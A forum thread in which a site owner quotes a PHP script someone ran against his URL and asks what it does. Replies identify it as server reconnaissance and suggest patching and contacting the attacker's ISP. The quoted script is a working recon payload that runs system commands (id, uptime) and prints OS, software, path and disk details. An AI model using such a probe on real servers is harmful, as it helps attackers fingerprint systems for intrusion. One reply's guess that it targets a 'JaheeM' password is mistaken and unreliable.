Firstly I do not know if this is the right section to post, sorry if it is not and could you please move it to the right section Thank you. I have a tracking system on one of my sites, and I have a guy trying to do something strange he is running this code on my url: <?php function ConvertBytes($number) { $len = strlen($number); if($len < 4) { return sprintf("%d b", $number); } if($len >= 4 && $len <=6) { return sprintf("%0.2f Kb", $number/1024); } if($len >= 7 && $len <=9) { return sprintf("%0.2f Mb", $number/1024/1024); } return sprintf("%0.2f Gb", $number/1024/1024/1024); } echo "JaheeM<br>"; $un = @php_uname(); $up = system(uptime); $id1 = system(id); $pwd1 = @getcwd(); $sof1 = getenv("SERVER_SOFTWARE"); $php1 = phpversion(); $name1 = $_SERVER['SERVER_NAME']; $ip1 = gethostbyname($SERVER_ADDR); $free1= diskfreespace($pwd1); $free = ConvertBytes(diskfreespace($pwd1)); if (!$free) {$free = 0;} $all1= disk_total_space($pwd1); $all = ConvertBytes(disk_total_space($pwd1)); if (!$all) {$all = 0;} $used = ConvertBytes($all1-$free1); $os = @PHP_OS; echo "JaheeM<br>"; echo "uname -a: $un<br>"; echo "os: $os<br>"; echo "uptime: $up<br>"; echo "id: $id1<br>"; echo "pwd: $pwd1<br>"; echo "php: $php1<br>"; echo "software: $sof1<br>"; echo "server-name: $name1<br>"; echo "server-ip: $ip1<br>"; echo "free: $free<br>"; echo "used: $used<br>"; echo "total: $all<br>"; exit; PHP: Any idea what he is trying to do?
I know very little about PHP...but I guess he may be trying to hack password of JaheeM(may be this is username)
He's getting the versions and names of the software installed on the server, perhaps hoping for a version of one of the software packages that has vulnerabilities he can exploit. He's also getting all the info he needs to exploit most vulnerabilities in installed software that this would also find. If you mean he's already run it, then check there are no updated versions for any of the software on your server (that don't introduce new vulnerabilities). Also try looking up his IP to find his ISP and complaining to them about his hacking (preparation). Assuming he wasn't using a proxy just then, you might be able to persuade them to talk to/cut him off about it. infohq.com/Computer/Spam/finding-hackers-isp-using-ip-address.htm has some instructions for how to do that. (If the email lines are not returned, just find contact emails on the ISP's website).
I am going to look into this further, I am already in the process of talking to my host about this issue. I am really thankfull for your reply. Regards, Aceuk.
Yeah, definitely not legit, he's trying to get information about your site and server so that he can do something malicious. Make sure you deny him access to your site and talk to the ISP